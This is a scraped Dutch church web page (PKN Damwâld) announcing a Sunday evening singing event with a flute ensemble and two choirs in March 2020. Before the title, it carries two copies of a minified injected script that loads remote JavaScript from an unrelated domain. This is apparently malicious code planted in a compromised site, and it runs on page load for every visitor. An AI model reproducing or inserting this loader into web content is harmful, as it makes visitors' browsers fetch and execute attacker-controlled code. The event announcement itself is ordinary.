;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dwarsfluitensemble en koor in Zondagavondzang Damwâld - PKN Damwâld

Dwarsfluitensemble en koor in Zondagavondzang Damwâld

Gepubliceerd op: maandag 24 februari 2020

Op zondag 8 maart 2020 vindt weer de jaarlijkse zondagavondzang plaats in “de Ontmoeting” Foarwei 48 te Damwâld. Aan deze avond werken het dwarsfluitensemble Flautas Unicas, gemengd koor Cantata Deo en vrouwenkoor Carmina mee. Het dwarsfluitensemble staat onder leiding van Jacqueline Brunt en bestaat uit gevorderde, enthousiaste leerlingen van Opus 3, muziekschool in Dokkum. Bijzonder aan dit ensemble is dat het uit verschillende soorten dwarsfluiten bestaat. Naast de voor een ieder bekende dwarsfluit, treft u ook een alt dwarsfluit, bas dwarsfluit en een contrabas dwarsfluit aan. Stuk voor stuk prachtige instrumenten om te zien en te beluisteren.

Het koor Cantate Deo uit Dokkum en vrouwenkoor Carmina uit Damwâld genieten grote bekendheid in de regio en staat onder leiding van Johanna van der Weide-Jongsma. Met muzikale begeleiding van vaste organist Fedde de Vries en cornettist Pieter Reitsma wordt deze zondagavondzang compleet gemaakt. U kunt genieten van prachtige muziek, afgewisseld door koorzang en samenzang. Er wordt een collecte gehouden ter bestrijding van de onkosten. Aanvang is 19.30 uur. Wij zien uw komst graag tegemoet!